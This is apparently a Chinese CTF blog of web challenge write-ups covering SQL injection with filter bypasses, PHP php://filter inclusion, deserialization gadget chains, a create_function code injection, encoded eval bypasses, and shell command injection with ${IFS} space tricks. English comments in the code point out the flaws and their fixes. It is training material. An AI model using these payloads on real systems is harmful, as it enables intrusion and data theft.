post @ 2023-07-11

题目链接

页面内容

年轻的Web手啊!
看题目名就知道你该干嘛了吧~
用相对安全的方式传参吧
奥对了参数是nss

参数为nss, GET发送无效; POST nss=1发送成功 返回内容:

Flag: NSSCTF{This_1s_F4ke_flag}
This is true flag: NSSCTF{Ar3_y0u_K1ngd1ng}

注入

  • 尝试联合注入

    > nss=-1' union select 1,2%23
    < You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'select1,2#' LIMIT 0,1' at line 1

    从报错可以发现空格和union被消除

    尝试绕过 成功

    > nss=-1'/**/ununionion/**/select/**/1,2,3%23
    < Flag: NSSCTF{This_1s_F4ke_flag}
    This is true flag: NSSCTF{Ar3_y0u_K1ngd1ng}

    # 查看第二行内容
    > nss=-1'/**/ununionion/**/select/**/1,2,3/**/limit/**/1,1%23
    < Flag: 2
    This is true flag: 3
  • 接着常规流程注入

    注意or也会被屏蔽 所以information要更改为infoorrmation

    > nss=-1'/**/ununionion/**/select/**/1,2,group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()/**/limit/**/1,1%23
    < Flag: 2
    This is true flag: NSS_tb,users

    > nss=-1'/**/ununionion/**/select/**/1,2,group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='NSS_tb'/**/limit/**/1,1%23

    < Flag: 2
    This is true flag: id,Secr3t,flll444g


    > nss=-1'/**/ununionion/**/select/**/id,group_concat(Secr3t),group_concat(flll444g)/**/from/**/NSS_db.NSS_tb/**/limit/**/1,1%23

    < Flag: NSSCTF{b3c1613c-6acb-46f4-9510-f3184bd69eb5}
    This is true flag: NSSCTF{I_d0nt_want_t0_w4ke_up}
post @ 2023-07-11

题目链接

页面源码

<?php 
highlight_file(__FILE__);
// Sink: include() on an attacker-controlled POST value with no allow-list, so any
// readable local path or stream wrapper can be pulled in (the write-up uses php://filter).
// Mitigation: map request input to a fixed set of known files; never pass it to include().
include($_POST["flag"]);
//flag in /var/www/html/flag.php;

exp

伪协议查看flag

发现被过滤

?flag=php://filter/convert.base64-encode/resource=flag.php

查看index源码

当输入长度小于800时 过滤flag

// ?flag=php://filter/convert.base64-encode/resource=index.php
// (author's note above: the request that returned this file's own source, base64-encoded)

<?php
$path = $_POST["flag"];
// The /flag/ check only runs while the raw request body is under 800 bytes, so it is a
// length-gated denylist rather than a control: padding the body skips it entirely.
// Mitigation: validate $path against an allow-list regardless of body size, and drop the
// @ so include failures are not hidden.
if (strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path)) {
echo 'nssctf waf!';
} else {
@include($path);
}
?>

最后发送字符数>800 然后查看flag

1
a=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&flag=php://filter/convert.base64-encode/resource=flag.php
post @ 2023-07-11

题目链接

页面源码

<?php
error_reporting(0);
if (isset($_GET['file'])) {
// Prefix check only: any value starting with "php" reaches include(), which is exactly
// what php:// stream wrappers look like. Mitigation: allow-list concrete file names
// instead of inspecting a prefix.
if ( substr($_GET["file"], 0, 3) === "php" ) {
echo "Nice!!!";
include($_GET["file"]);
}

else {
echo "Hacker!!";
}
}else {
highlight_file(__FILE__);
}
//flag.php

分析

  1. 提示flag.php
  2. 过滤要求输入为php开头 明显使用伪协议

php伪协议

1)file:// 访问本地文件系统

2)http:// 访问HTTP(S)网址

3)ftp:// 访问FTP(S)URL

4)php:// 访问各个输出输入流 php://filter/convert.base64-encode/resource=flag.php

5)zlib:// 处理压缩流

6)data:// 读取数据

7)glob:// 查找匹配的文件路径模式

8)phar:// PHP归档

9)rar:// RAR数据压缩

exp

?file=php://filter/convert.base64-encode/resource=flag.php
// 获得base64 解码后提示flag在flag文件中
?file=php://filter/convert.base64-encode/resource=flag
// 获得flag
post @ 2023-07-09

题目链接

页面源码

<?php
// Challenge entry point: errors are silenced and the file's own source is displayed.
error_reporting(0);
show_source("index.php");
// Holds the credentials checked by Getflag(). Both properties are non-public, so a
// serialized payload must reproduce their mangled names (private "\0w44m\0admin",
// protected "\0*\0passwd"); the defaults already equal the expected values.
class w44m {
private $admin = 'w44m';
protected $passwd = '08067';

// Includes flag.php and prints $flag when both defaults are intact. Nothing in this
// file calls Getflag() by name; it is only reachable through the dynamic call in w33m.
public function Getflag(){
if($this->admin === 'w44m' && $this->passwd ==='08067'){
include('flag.php'); // [1]
echo $flag; // presumably set by flag.php — not visible in this listing
}else{
echo $this->admin;
echo $this->passwd;
echo 'nono';
}
}
}
// Chain entry point: the destructor runs automatically when the object created by
// unserialize() is released, and echo on an object operand invokes its __toString().
class w22m{
public $w00m;
public function __destruct(){
echo $this->w00m; // [3]
}
}
// Arbitrary-method-call gadget: both the receiver ($w00m) and the method name ($w22m)
// come from the payload, so any public method of any in-scope class can be invoked.
class w33m{
public $w00m;
public $w22m;
public function __toString(){
$this->w00m->{$this->w22m}(); // [2]
return 0; // not a string; the call above has already run by the time this is evaluated
}
}
// Sink: unserialize() on raw query input instantiates any class in scope and fires
// its magic methods. Mitigation: json_decode() for data, or at minimum
// unserialize($w00m, ['allowed_classes' => false]).
$w00m = $_GET['w00m'];
unserialize($w00m);
?>

分析

  1. 目标肯定为执行echo $flag;
  2. 要能执行 [1] 需找到Getflag的可能调用,由此定位到 [2] 令w22m=Getflag字符串即可
  3. 要能执行__toString需找到将类当作字符串使用的地方,由此定位到 [3]

exp

逆序构造

  1. 创建w22m对象 其中$w00m字段为w33m对象

  2. 创建w33m对象 其中$w00m为w44m对象 $w22m为Getflag字符串

  3. 创建w44m对象 其中 $admin = 'w44m'; $passwd = '08067';

<?php
// Header copied from the challenge; show_source() of a file that may not exist locally
// is harmless because errors are silenced.
error_reporting(0);
show_source("index.php");

// Stub of the target class: serialize() only encodes property names, order, visibility
// and values, so the methods are omitted. Visibility matters — private and protected
// names are mangled with NUL bytes in the output.
class w44m {
private $admin = 'w44m';
protected $passwd = '08067';
}

// Stub of the target's destructor gadget; $w00m will hold the w33m instance.
class w22m{
public $w00m;
}

// Stub of the target's __toString gadget: $w22m is pre-set to the method name that the
// target's dynamic call will invoke on $w00m.
class w33m{
public $w00m;
public $w22m="Getflag";
}

// Chain assembled outermost-first: w22m (destructor) -> w33m (__toString) -> w44m (target).
$a=new w22m;
$b=new w33m;
$b->w00m=new w44m;
$a->w00m=$b;

echo serialize($a) . "\n";
// The URL-encoded form is the one that must be sent: the mangled private/protected
// names contain NUL bytes (visible as %00 below) that a raw query string cannot carry.
echo urlencode(serialize($a)) . "\n";

// ?w00m=O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D
post @ 2023-07-08

题目链接

页面源码

  • 关键点: unserialize($this->key)();
  • 做题做魔怔了 一开始就在想类对象加括号是调用了什么 实际上字符串也可以被序列化&反序列化
  • 若将 "phpinfo" 序列化后传输 则会执行 phpinfo();
<?php
error_reporting(0);
highlight_file(__FILE__);
$pwd=getcwd(); // assigned but not referenced anywhere else in this listing
// Gadget class: its destructor runs automatically on the object produced by the
// unserialize() call at the bottom of this file.
class func {
public $mod1;
public $mod2;
public $key;
// $key is itself a serialized value and the result of unserializing it is invoked
// immediately: a serialized string is called as a function name, a serialized
// [object, "method"] array as a method call (the write-up uses both forms).
public function __destruct() {
unserialize($this->key)();
$this->mod2 = "welcome ".$this->mod1;
}
}

// Second gadget: never instantiated by this file itself, only reachable through a
// serialized [GetFlag, "get_flag"] pair placed in func::$key.
class GetFlag {
public $code;
public $action;
// Calls whatever function name $action holds with '' and $code as arguments — an
// arbitrary function call whose second argument is attacker-chosen.
public function get_flag(){
$a=$this->action;
$a('', $this->code);
}
}
// Sink: unserialize() on raw query input. Mitigation: json_decode() for data, or at
// minimum unserialize($_GET[0], ['allowed_classes' => false]).
unserialize($_GET[0]);
?>

尝试执行phpinfo

<?php

// Mirror of the target's func class: same property names and order, no methods, so
// serialize() emits the layout the target expects and no destructor runs locally.
class func
{
public $mod1 = "a";
public $mod2 = "b";
public $key;
}

// Mirror of the target's GetFlag class; not used by this first probe.
class GetFlag
{ public $code;
public $action;
}
$a = new func;
// A serialized *string* is the simplest callable: the target unserializes it back to
// "phpinfo" and calls it with no arguments.
$a -> key = serialize("phpinfo");

echo serialize($a) . "\n";
# O:4:"func":3:{s:4:"mod1";s:1:"a";s:4:"mod2";s:1:"b";s:3:"key";s:14:"s:7:"phpinfo";";}
# Sent as ?0=O:4:"func":3:{s:4:"mod1";s:1:"a";s:4:"mod2";s:1:"b";s:3:"key";s:14:"s:7:"phpinfo";";} — phpinfo() was invoked

php数组特性

当一个数组被当作函数调用时 如果数组第一个元素为类对象 第二个元素为这个对象内的方法名 那么就会调用该对象下的该方法

思路:

  1. 让 $a->key = serialize([new GetFlag, "get_flag"])
  2. 设置$action为create_function 并构造code 执行

create_function

功能

create_function() 会创建一个匿名函数(lambda 样式), 函数名是以 lambda 开头的一个自增的函数名。注意该函数在较新的 PHP 版本中已被弃用并移除, 因此这一利用方式只对旧版本目标有效。

// create_function() compiles its two string arguments into a new function, i.e. it is
// eval() with extra steps; it is deprecated and removed in modern PHP, so this only
// applies to legacy targets.
create_function('$a, $b','echo ($a+$b);'); // returns lambda_1
// equivalent to
function lambda_1($a,$b){
echo ($a+$b);
}

$f= create_function('$a, $b','echo ($a+$b);');
$f(1, 2); // 3

底层实现

对用户传入参数function_args,function_code进行拼接构造

function  __lambda_func ( function_args ) { function_code } \0;
# 如果可控在第一个参数,需要闭合圆括号和大括号: create_function('){}phpinfo();//', '');
# 如果可控在第二个参数,需要闭合大括号: create_function('', '}phpinfo();//');

exp

<?php

// Mirror of the target's func class (properties only, no destructor locally).
class func
{
public $mod1 = "a";
public $mod2 = "b";
public $key;
}

// $code closes the generated function body early so the remainder is compiled as
// top-level code when create_function() defines it (see the template in the prose
// above); $action names the function that get_flag() will call.
class GetFlag
{ public $code = ';}system("ls /");//';
public $action = "create_function";
}
$a = new func;
// Callable-array form: [object, "method"] is dispatched to GetFlag::get_flag() when the
// target's func::__destruct unserializes and invokes $key.
$a->key= serialize([new GetFlag, "get_flag"]);

echo serialize($a) . "\n";
# O:4:"func":3:{s:4:"mod1";s:1:"a";s:4:"mod2";s:1:"b";s:3:"key";s:121:"a:2:{i:0;O:7:"GetFlag":2:{s:4:"code";s:19:";}system("ls /");//";s:6:"action";s:15:"create_function";}i:1;s:8:"get_flag";}";}
post @ 2023-07-08

题目链接

页面源码

屏蔽字母和若干符号

 <?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm'])) {
$wllm = $_GET['wllm'];
// Denylist: each item is interpolated into a regex and tested separately. Neither this
// list nor the letter check below covers "~", "(", ")", ";" or bytes outside ASCII,
// which is why the bitwise-NOT form in the write-up passes. There is no filter that
// makes eval() on request data safe; the mitigation is to remove the eval.
$blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $wllm)) {
die("LTLT说不能用这些奇奇怪怪的符号哦!");
}
}
// Only ASCII letters are rejected; the /i flag is redundant with the a-zA-Z class.
if(preg_match('/[a-zA-Z]/is',$wllm)) {
die("Ra's Al Ghul说不能用字母哦!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm); // sink: remaining input is executed as PHP
}
else {
echo "蔡总说:注意审题!!!";
}
?>

url编码取反绕过

<?php
// Per-byte bitwise NOT of the name, URL-encoded. The result contains only bytes
// >= 0x80, which neither the symbol denylist nor the [a-zA-Z] check of the target
// matches, and "~" restores the original bytes at runtime — one reason a denylist in
// front of eval() cannot be made safe.
$word = 'system';
printf("~%s\n", urlencode(~$word));

# system: ~%8C%86%8C%8B%9A%92
# ls: ~%93%8C

构造发送

?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C);	# 相当于system(ls);
post @ 2023-07-07

题目链接

页面源码

明显反序列化漏洞 但是反序列化会自动调用 __wakeup() 函数 对 passwd 进行 sha1 哈希(不可逆)

<?php
// Challenge entry point: errors silenced, class.php's source displayed.
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{
public $admin;
public $passwd;

// Not executed on unserialize(): constructors are skipped and the property values come
// straight from the payload.
public function __construct(){
$this->admin ="user";
$this->passwd = "123456";
}

// Runs after a well-formed payload is restored and replaces passwd with its SHA-1 hex
// digest, so a literal "wllm" can only survive if __wakeup() does not run.
public function __wakeup(){
$this->passwd = sha1($this->passwd);
}

// Checked when the object is released; needs the raw (pre-hash) values intact.
public function __destruct(){
if($this->admin === "admin" && $this->passwd === "wllm"){
include("flag.php");
echo $flag; // presumably set by flag.php — not visible in this listing
}else{
echo $this->passwd;
echo "No wake up";
}
}
}
// Sink: unserialize() on raw query input. Mitigation: json_decode() for data, or at
// minimum unserialize($Letmeseesee, ['allowed_classes' => false]).
$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);

绕过wakeup

PHP 特性: 当序列化字符串中声明的成员个数与实际成员个数不符时, 旧版本 PHP 不会调用 __wakeup(); 该行为在后续版本中已修复, 因此此绕过依赖目标的 PHP 版本。

<?php
// Stub with the target's property names; the defaults are the values its __destruct()
// compares against. No __wakeup() here, so serialize() emits them unchanged.
class HaHaHa{
public $admin = "admin";
public $passwd = "wllm";
}

echo serialize(new HaHaHa) . "\n";

# O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
# Raise the declared member count from 2 to 3 (the count/property mismatch skips
# __wakeup() on affected PHP builds): O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
# Sending it returned the flag
post @ 2023-07-06

题目链接

# 空格和等号都被过滤 
# 空格替换为 /**/
# 等号替换为 like

# 查看列数、数据库名
?wllm=-1'order/**/by/**/3%23
?wllm=-1'union/**/select/**/1,2,database()%23

# 查看表名发现有LTLT_flag
?wllm=-1'union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/'test_db'%23

# 查看LTLT_flag中列名发现有flag
?wllm=-1'union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'LTLT_flag'%23

# 查看flag 但是发现有长度截取
?wllm=-1'union/**/select/**/1,2,group_concat(flag)/**/from/**/test_db.LTLT_flag%23

# substr substring right reverse都被屏蔽 发现mid可用(相当于substr) 一组组获取flag
?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),1,20)/**/from/**/test_db.LTLT_flag%23
post @ 2023-07-06

题目链接

页面内容

 <?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__);
// Authorization decided by a client-supplied cookie, compared loosely (==); the client
// sets admin=1 freely. Mitigation: keep the admin flag in server-side session state and
// compare with ===.
if($_COOKIE['admin']==1)
{
include "../next.php";
}
else
echo "小饼干最好吃啦!";
?> 小饼干最好吃啦!

设置cookie

import requests

# The gate in the challenge source is `$_COOKIE['admin']==1`, so a client-set cookie is
# all that is needed to reach the included file.
target_url = "http://node1.anna.nssctf.cn:28246/"
page = requests.get(target_url, cookies={"admin": "1"})
print(page.text)

# Response revealed rasalghul.php

访问rasalghul.php 有

<?php
error_reporting(0);
highlight_file(__FILE__);
error_reporting(0); // duplicate of the call two lines up
if (isset($_GET['url'])) {
$ip=$_GET['url'];
// "/ /" rejects only the literal space byte; everything else goes verbatim to the
// shell. Mitigation: do not run request input through a shell at all — if a host
// must be reached, validate it with filter_var($ip, FILTER_VALIDATE_IP) and pass it
// as a single escapeshellarg() argument to a fixed command.
if(preg_match("/ /", $ip)){
die('nonono');
}
$a = shell_exec($ip); // sink: command injection
echo $a;
}

命令执行 空格绕过得到flag

1
?url=cat${IFS}/flllllaaaaaaggggggg;

补充 [空格绕过]:

$IFS
${IFS}
$IFS$9
{cat,flag.php}
<
>
%20
%09
post @ 2023-07-05

题目链接

> ?wllm=1'	# 尝试看看是否为sql查询
< You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
# 说明确实为MariaDB sql查询且存在注入漏洞

> ?wllm=1' order by 3--+
< Your Login name:xxx
Your Password:yyy # 正常
> ?wllm=1' order by 4--+
< Unknown column '4' in 'order clause' # 异常
# 说明读取列数为3,接着联合查询

> ?wllm=1' union select 1,2,3--+
< Your Login name:xxx
Your Password:yyy # 正常
> ?wllm=1' union select 1,2,3 limit 1,1--+ # 取第一行
< Your Login name:2
Your Password:3 # 说明Loginname为第二字段 password为第三字段

# 获取database名
> ?wllm=1' union select 1,2,database() limit 1,1--+
< Your Login name:2
Your Password:test_db

# 获取tables
> ?wllm=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db' limit 1,1--+
< Your Login name:2
Your Password:test_tb,users

# 获取columns
> ?wllm=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb' limit 1,1--+
< Your Login name:2
Your Password:id,flag

# 获取flag
> ?wllm=1' union select 1,2,flag from test_db.test_tb limit 1,1--+
< Your Login name:2
Your Password:NSSCTF{85fe17d6-6beb-479d-a957-c69fb83d8217}